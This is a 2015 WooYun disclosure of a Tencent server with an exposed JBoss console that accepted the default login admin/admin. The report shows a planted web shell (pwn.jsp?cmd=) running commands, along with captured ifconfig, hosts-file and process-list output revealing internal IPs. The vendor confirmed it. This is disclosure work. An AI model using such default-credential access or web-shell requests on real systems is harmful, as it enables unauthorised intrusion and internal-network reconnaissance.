当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114755

漏洞标题:腾讯某服务器后台匿名访问(可SHELL内网漫游)

相关厂商:腾讯

漏洞作者: 猪猪侠

提交时间:2015-05-18 11:48

修复时间:2015-07-02 16:02

公开时间:2015-07-02 16:02

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

穿甲弹,腾讯某服务器后台匿名访问(可SHELL内网漫游)

详细说明:

http://health.gj.qq.com:8080/jmx-console/

qq_1.png


OS Name: Linux
OS Version: 2.6.32.43-tlinux-1.0.10-state
Architecture: amd64
Distribution Name: CentOS Linux
Distribution Version: release 6.2 (Final)


http://health.gj.qq.com:8080/admin-console/secure/summary.seam?conversationId=4
admin
admin

qq_2.jpg


http://health.gj.qq.com:8080/a/pwn.jsp?cmd=ifconfig%20-a

eth0      Link encap:Ethernet  HWaddr 00:E0:81:EA:3B:36  
          inet addr:183.232.90.74  Bcast:183.232.90.127  Mask:255.255.255.128
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17987845 errors:0 dropped:0 overruns:0 frame:0
          TX packets:366798 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1115490791 (1.0 GiB)  TX bytes:101684624 (96.9 MiB)
eth1      Link encap:Ethernet  HWaddr 00:E0:81:EA:3B:37  
          inet addr:10.229.136.220  Bcast:10.229.136.255  Mask:255.255.255.192
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1154181482 errors:0 dropped:0 overruns:0 frame:0
          TX packets:497012765 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1568980382465 (1.4 TiB)  TX bytes:497529017582 (463.3 GiB)
ip6tnl0   Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          NOARP  MTU:1460  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2344759 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2344759 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1149731220 (1.0 GiB)  TX bytes:1149731220 (1.0 GiB)
sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
tunl0     Link encap:IPIP Tunnel  HWaddr   
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)


漏洞证明:

::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
#
# You can set dns to resolve following domain name
# for DNS, see http://km.oa.com/group/gslb/article_view/60750
# tlinux team <t_os@tencent.com>
#
172.25.10.69    tlinux-mirrorlist.tencent-cloud.com tlinux-mirror.tencent-cloud.com
172.25.10.70    tlinux-mirrorlist.tencent-cloud.com tlinux-mirror.tencent-cloud.com
10.204.8.218    10-204-8-218
10.187.130.211  10-187-130-211
10.187.130.212  10-187-130-212
10.187.130.213  10-187-130-213
10.209.19.151 10-209-19-151
10.224.128.103 10-224-128-103
10.224.128.91 10-224-128-91
10.224.129.82 10-224-129-82
127.0.0.1 localhost
10.204.8.218    10-204-8-218
10.187.130.211  10-187-130-211
10.187.130.212  10-187-130-212
10.187.130.213  10-187-130-213
10.209.19.151 10-209-19-151
10.224.128.103 10-224-128-103
10.224.128.91 10-224-128-91
10.224.129.82 10-224-129-82
10.229.136.220 10-229-136-220


UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 May04 ?        00:00:36 /sbin/init
root         2     0  0 May04 ?        00:00:00 [kthreadd]
root         3     2  0 May04 ?        00:00:01 [migration/0]
root         4     2  0 May04 ?        00:00:16 [ksoftirqd/0]
root         5     2  0 May04 ?        00:00:00 [watchdog/0]
root         6     2  0 May04 ?        00:00:01 [migration/1]
root         7     2  0 May04 ?        00:00:12 [ksoftirqd/1]
root         8     2  0 May04 ?        00:00:00 [watchdog/1]
root         9     2  0 May04 ?        00:00:00 [migration/2]
root        10     2  0 May04 ?        00:00:13 [ksoftirqd/2]
root        11     2  0 May04 ?        00:00:00 [watchdog/2]
root        12     2  0 May04 ?        00:00:00 [migration/3]
root        13     2  0 May04 ?        00:00:16 [ksoftirqd/3]
root        14     2  0 May04 ?        00:00:00 [watchdog/3]
root        15     2  0 May04 ?        00:00:01 [migration/4]
root        16     2  0 May04 ?        00:00:06 [ksoftirqd/4]
root        17     2  0 May04 ?        00:00:00 [watchdog/4]
root        18     2  0 May04 ?        00:00:04 [migration/5]
root        19     2  0 May04 ?        00:00:05 [ksoftirqd/5]
root        20     2  0 May04 ?        00:00:00 [watchdog/5]
root        21     2  0 May04 ?        00:00:02 [migration/6]
root        22     2  0 May04 ?        00:00:04 [ksoftirqd/6]
root        23     2  0 May04 ?        00:00:00 [watchdog/6]
root        24     2  0 May04 ?        00:00:02 [migration/7]
root        25     2  0 May04 ?        00:00:04 [ksoftirqd/7]
root        26     2  0 May04 ?        00:00:00 [watchdog/7]
root        27     2  0 May04 ?        00:01:11 [events/0]
root        28     2  0 May04 ?        00:00:18 [events/1]
root        29     2  0 May04 ?        00:00:18 [events/2]
root        30     2  0 May04 ?        00:00:16 [events/3]
root        31     2  0 May04 ?        00:00:18 [events/4]
root        32     2  0 May04 ?        00:00:17 [events/5]
root        33     2  0 May04 ?        00:00:17 [events/6]
root        34     2  0 May04 ?        00:02:14 [events/7]
root        35     2  0 May04 ?        00:00:00 [khelper]
root        40     2  0 May04 ?        00:00:00 [async/mgr]
root        41     2  0 May04 ?        00:00:00 [pm]
root       380     2  0 May04 ?        00:00:00 [sync_supers]
root       382     2  0 May04 ?        00:00:00 [bdi-default]
root       383     2  0 May04 ?        00:00:00 [kintegrityd/0]
root       384     2  0 May04 ?        00:00:00 [kintegrityd/1]
root       385     2  0 May04 ?        00:00:00 [kintegrityd/2]
root       386     2  0 May04 ?        00:00:00 [kintegrityd/3]
root       387     2  0 May04 ?        00:00:00 [kintegrityd/4]
root       388     2  0 May04 ?        00:00:00 [kintegrityd/5]
root       389     2  0 May04 ?        00:00:00 [kintegrityd/6]
root       390     2  0 May04 ?        00:00:00 [kintegrityd/7]
root       392     2  0 May04 ?        00:00:06 [kblockd/0]
root       393     2  0 May04 ?        00:00:00 [kblockd/1]
root       394     2  0 May04 ?        00:00:00 [kblockd/2]
root       395     2  0 May04 ?        00:00:00 [kblockd/3]
root       396     2  0 May04 ?        00:00:01 [kblockd/4]
root       397     2  0 May04 ?        00:00:00 [kblockd/5]
root       398     2  0 May04 ?        00:00:00 [kblockd/6]
root       399     2  0 May04 ?        00:00:00 [kblockd/7]
root       400     2  0 May04 ?        00:00:00 [kacpid]
root       401     2  0 May04 ?        00:00:00 [kacpi_notify]
root       402     2  0 May04 ?        00:00:00 [kacpi_hotplug]
root       555     2  0 May04 ?        00:00:00 [ata/0]
root       556     2  0 May04 ?        00:00:00 [ata/1]
root       557     2  0 May04 ?        00:00:00 [ata/2]
root       558     2  0 May04 ?        00:00:00 [ata/3]
root       559     2  0 May04 ?        00:00:00 [ata/4]
root       560     2  0 May04 ?        00:00:00 [ata/5]
root       561     2  0 May04 ?        00:00:00 [ata/6]
root       562     2  0 May04 ?        00:00:00 [ata/7]
root       563     2  0 May04 ?        00:00:00 [ata_aux]
root       570     2  0 May04 ?        00:00:00 [ksuspend_usbd]
root       575     2  0 May04 ?        00:00:00 [khubd]
root       578     2  0 May04 ?        00:00:00 [kseriod]
root       621     2  0 May04 ?        00:00:00 [rpciod/0]
root       622     2  0 May04 ?        00:00:00 [rpciod/1]
root       623     2  0 May04 ?        00:00:00 [rpciod/2]
root       624     2  0 May04 ?        00:00:00 [rpciod/3]
root       625     2  0 May04 ?        00:00:00 [rpciod/4]
root       626     2  0 May04 ?        00:00:00 [rpciod/5]
root       627     2  0 May04 ?        00:00:00 [rpciod/6]
root       628     2  0 May04 ?        00:00:00 [rpciod/7]
root       718     2  0 May04 ?        00:00:00 [khungtaskd]
root       719     2  0 May04 ?        00:00:32 [kswapd0]
root       720     2  0 May04 ?        00:00:00 [aio/0]
root       721     2  0 May04 ?        00:00:00 [aio/1]
root       722     2  0 May04 ?        00:00:00 [aio/2]
root       723     2  0 May04 ?        00:00:00 [aio/3]
root       724     2  0 May04 ?        00:00:00 [aio/4]
root       725     2  0 May04 ?        00:00:00 [aio/5]
root       726     2  0 May04 ?        00:00:00 [aio/6]
root       727     2  0 May04 ?        00:00:00 [aio/7]
root       728     2  0 May04 ?        00:00:00 [nfsiod]
root       732     2  0 May04 ?        00:00:00 [xfs_mru_cache]
root       733     2  0 May04 ?        00:00:00 [xfslogd/0]
root       734     2  0 May04 ?        00:00:00 [xfslogd/1]
root       735     2  0 May04 ?        00:00:00 [xfslogd/2]
root       736     2  0 May04 ?        00:00:00 [xfslogd/3]
root       737     2  0 May04 ?        00:00:00 [xfslogd/4]
root       738     2  0 May04 ?        00:00:00 [xfslogd/5]
root       739     2  0 May04 ?        00:00:00 [xfslogd/6]
root       740     2  0 May04 ?        00:00:00 [xfslogd/7]
root       741     2  0 May04 ?        00:00:00 [xfsdatad/0]
root       742     2  0 May04 ?        00:00:00 [xfsdatad/1]
root       743     2  0 May04 ?        00:00:00 [xfsdatad/2]
root       744     2  0 May04 ?        00:00:00 [xfsdatad/3]
root       745     2  0 May04 ?        00:00:00 [xfsdatad/4]
root       746     2  0 May04 ?        00:00:00 [xfsdatad/5]
root       747     2  0 May04 ?        00:00:00 [xfsdatad/6]
root       748     2  0 May04 ?        00:00:00 [xfsdatad/7]
root       749     2  0 May04 ?        00:00:00 [xfsconvertd/0]
root       750     2  0 May04 ?        00:00:00 [xfsconvertd/1]
root       751     2  0 May04 ?        00:00:00 [xfsconvertd/2]
root       752     2  0 May04 ?        00:00:00 [xfsconvertd/3]
root       753     2  0 May04 ?        00:00:00 [xfsconvertd/4]
root       754     2  0 May04 ?        00:00:00 [xfsconvertd/5]
root       755     2  0 May04 ?        00:00:00 [xfsconvertd/6]
root       756     2  0 May04 ?        00:00:00 [xfsconvertd/7]
root       757     2  0 May04 ?        00:00:00 [crypto/0]
root       758     2  0 May04 ?        00:00:00 [crypto/1]
root       759     2  0 May04 ?        00:00:00 [crypto/2]
root       760     2  0 May04 ?        00:00:00 [crypto/3]
root       761     2  0 May04 ?        00:00:00 [crypto/4]
root       762     2  0 May04 ?        00:00:00 [crypto/5]
root       763     2  0 May04 ?        00:00:00 [crypto/6]
root       764     2  0 May04 ?        00:00:00 [crypto/7]
root      1083     2  0 May04 ?        00:00:00 [cciss_scan]
root      1088     2  0 May04 ?        00:00:00 [scsi_eh_0]
root      1091     2  0 May04 ?        00:00:00 [scsi_eh_1]
root      1094     2  0 May04 ?        00:00:00 [scsi_eh_2]
root      1097     2  0 May04 ?        00:00:00 [scsi_eh_3]
root      1100     2  0 May04 ?        00:00:00 [scsi_eh_4]
root      1103     2  0 May04 ?        00:00:00 [scsi_eh_5]
root      1119     2  0 May04 ?        00:00:00 [scsi_tgtd/0]
root      1120     2  0 May04 ?        00:00:00 [scsi_tgtd/1]
root      1121     2  0 May04 ?        00:00:00 [scsi_tgtd/2]
root      1122     2  0 May04 ?        00:00:00 [scsi_tgtd/3]
root      1123     2  0 May04 ?        00:00:00 [scsi_tgtd/4]
root      1124     2  0 May04 ?        00:00:00 [scsi_tgtd/5]
root      1125     2  0 May04 ?        00:00:00 [scsi_tgtd/6]
root      1126     2  0 May04 ?        00:00:00 [scsi_tgtd/7]
root      1140     2  0 May04 ?        00:00:00 [iscsi_eh]
root      1161     2  0 May04 ?        00:00:00 [megasas_ocr/0]
root      1162     2  0 May04 ?        00:00:00 [megasas_ocr/1]
root      1163     2  0 May04 ?        00:00:00 [megasas_ocr/2]
root      1164     2  0 May04 ?        00:00:00 [megasas_ocr/3]
root      1165     2  0 May04 ?        00:00:00 [megasas_ocr/4]
root      1166     2  0 May04 ?        00:00:00 [megasas_ocr/5]
root      1167     2  0 May04 ?        00:00:00 [megasas_ocr/6]
root      1168     2  0 May04 ?        00:00:00 [megasas_ocr/7]
root      1176     2  0 May04 ?        00:00:00 [galaxysas_ocr/0]
root      1177     2  0 May04 ?        00:00:00 [galaxysas_ocr/1]
root      1178     2  0 May04 ?        00:00:00 [galaxysas_ocr/2]
root      1179     2  0 May04 ?        00:00:00 [galaxysas_ocr/3]
root      1180     2  0 May04 ?        00:00:00 [galaxysas_ocr/4]
root      1181     2  0 May04 ?        00:00:00 [galaxysas_ocr/5]
root      1182     2  0 May04 ?        00:00:00 [galaxysas_ocr/6]
root      1183     2  0 May04 ?        00:00:00 [galaxysas_ocr/7]
root      1184     2  0 May04 ?        00:00:00 [galaxysas_devic]
root      1256     2  0 May04 ?        00:00:00 [bnx2x]
root      1283     2  0 May04 ?        00:00:00 [kstriped]
root      1298     2  0 May04 ?        00:00:00 [kmpathd/0]
root      1299     2  0 May04 ?        00:00:00 [kmpathd/1]
root      1300     2  0 May04 ?        00:00:00 [kmpathd/2]
root      1301     2  0 May04 ?        00:00:00 [kmpathd/3]
root      1302     2  0 May04 ?        00:00:00 [kmpathd/4]
root      1303     2  0 May04 ?        00:00:00 [kmpathd/5]
root      1304     2  0 May04 ?        00:00:00 [kmpathd/6]
root      1305     2  0 May04 ?        00:00:00 [kmpathd/7]
root      1306     2  0 May04 ?        00:00:00 [kmpath_handlerd]
root      1307     2  0 May04 ?        00:00:00 [ksnapd]
root      1343     2  0 May04 ?        00:00:00 [usbhid_resumer]
root      1344     2  0 May04 ?        00:00:00 [usbhid_reset]
root      1372     2  0 May04 ?        00:00:05 [kjournald]
root      1451     1  0 May04 ?        00:00:00 /sbin/udevd -d
root      1895     2  0 May04 ?        00:00:17 [kjournald]
root      1896     2  0 May04 ?        00:00:18 [kjournald]
root      2205     2  0 May04 ?        00:03:26 [flush-8:0]
root      2351     1  0 May04 ?        00:00:05 /sbin/rsyslogd -i /var/run/syslogd.pid -c 4
dbus      2427     1  0 May04 ?        00:00:00 dbus-daemon --system
root      2508     1  0 May04 ?        00:00:03 /usr/sbin/atd
root      2898     1  0 May04 ?        00:00:00 /usr/bin/rsync --address=10.229.136.220 --daemon
root      3654     1  0 May04 tty1     00:00:00 /sbin/mingetty /dev/tty1
root      3656     1  0 May04 tty2     00:00:00 /sbin/mingetty /dev/tty2
root      3658     1  0 May04 tty3     00:00:00 /sbin/mingetty /dev/tty3
root      3660     1  0 May04 tty4     00:00:00 /sbin/mingetty /dev/tty4
root      3662     1  0 May04 tty5     00:00:00 /sbin/mingetty /dev/tty5
root      3664     1  0 May04 tty6     00:00:00 /sbin/mingetty /dev/tty6
root      3666  1451  0 May04 ?        00:00:00 /sbin/udevd -d
root      3667  1451  0 May04 ?        00:00:00 /sbin/udevd -d
root      4109     1  0 May04 ?        00:00:34 /usr/local/sa/agent/plugins/sap1004
root     16565     1  0 May16 ?        00:00:20 /usr/local/sa/agent/secu-tcs-agent /usr/local/sa/agent/secubase/secu-tcs-agent.cnf
root     16619     1  0 May16 ?        00:00:49 /usr/local/sa/agent/plugins/sap1002
root     16622     1  0 May16 ?        00:00:53 /usr/local/sa/agent/plugins/sap1008
root     16624     1  0 May16 ?        00:00:00 /usr/local/sa/agent/plugins/sap1014
root     16628     1  0 May16 ?        00:00:03 /usr/local/sa/agent/plugins/sap1001
root     16630     1  0 May16 ?        00:00:04 /usr/local/sa/agent/plugins/sap1007
root     16631 16565  0 May16 ?        00:00:11 /usr/local/sa/agent/plugins/sap1005
nslcd    17473     1  0 May07 ?        00:00:04 /usr/sbin/nslcd
nscd     17531     1  0 May07 ?        00:00:54 /usr/sbin/nscd
root     17551     1  0 May07 ?        00:00:00 /usr/sbin/sshd
root     17555     1  0 May07 ?        00:00:00 /usr/sbin/sshd -o pidFile=/var/run/sshd_56000.pid -f /etc/ssh/sshd_config.l
root     17593     1  0 May07 ?        00:00:04 crond
root     17723 17593  0 11:54 ?        00:00:00 CROND
root     17728 17723  0 11:54 ?        00:00:00 /bin/sh -c /usr/local/agenttools/agent/ServerMonitor.py  >/dev/null 2>&1
root     17729 17728  0 11:54 ?        00:00:00 python /usr/local/agenttools/agent/ServerMonitor.py
root     17751 17729  0 11:54 ?        00:00:00 python /usr/local/agenttools/agent/ServerMonitor.py
root     17752 17729  0 11:54 ?        00:00:00 python /usr/local/agenttools/agent/ServerMonitor.py
root     17755 17729  0 11:54 ?        00:00:00 python /usr/local/agenttools/agent/ServerMonitor.py
root     17760 17729  0 11:54 ?        00:00:00 python /usr/local/agenttools/agent/ServerMonitor.py
root     17764 17729  0 11:54 ?        00:00:00 python /usr/local/agenttools/agent/ServerMonitor.py
root     17888     1  0 May07 ?        00:03:14 /bin/sh ./safe_TsysAgent.sh start
root     17910     1  0 May07 ?        00:03:13 /bin/sh ./safe_TsysProxy.sh start
root     17929 17888  0 May07 ?        00:02:36 /usr/local/TsysAgent/bin/TsysAgent
root     17937 17910  0 May07 ?        00:03:35 /usr/local/TsysAgent/bin/TsysProxy
root     18047 17910  0 11:54 ?        00:00:00 sleep 5
root     18048 17888  0 11:54 ?        00:00:00 sleep 5
jboss    18072 21076  0 11:54 ?        00:00:00 ps -ef
root     18081     1  0 May07 ?        00:00:12 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf
root     18086     1  0 May07 ?        00:00:01 /usr/local/agenttools/agent/agentPlugInD
root     18090     1  0 May07 ?        00:01:41 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf
root     18094     1  0 May07 ?        00:00:22 /usr/local/agenttools/agent/tcvmstat
root     18103     1  0 May07 ?        00:00:12 /usr/local/agenttools/agent/sysddd
jboss    21000     1  0 May14 ?        00:00:00 /bin/sh /home/jboss/bin/run.sh -c default -b 0.0.0.0
jboss    21076 21000  0 May14 ?        00:17:29 /home/jdk/bin/java -server -Xms128m -Xmx512m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Djava.net.preferIPv4Stack=true -Dprogram.name=run.sh -Dlogging.configuration=file:/home/jboss/bin/logging.properties -Djava.library.path=/home/jboss/bin/native/lib64 -Djava.endorsed.dirs=/home/jboss/lib/endorsed -classpath /home/jboss/bin/run.jar:/home/jdk/lib/tools.jar org.jboss.Main -c default -b 0.0.0.0
root     22753     1  0 May04 ?        00:01:32 /usr/local/support/wsd_agent/wsd_agent /usr/local/support/wsd_agent/wsd_agent.conf

修复方案:

处理

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-18 16:01

厂商回复:

确认存在的漏洞 非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无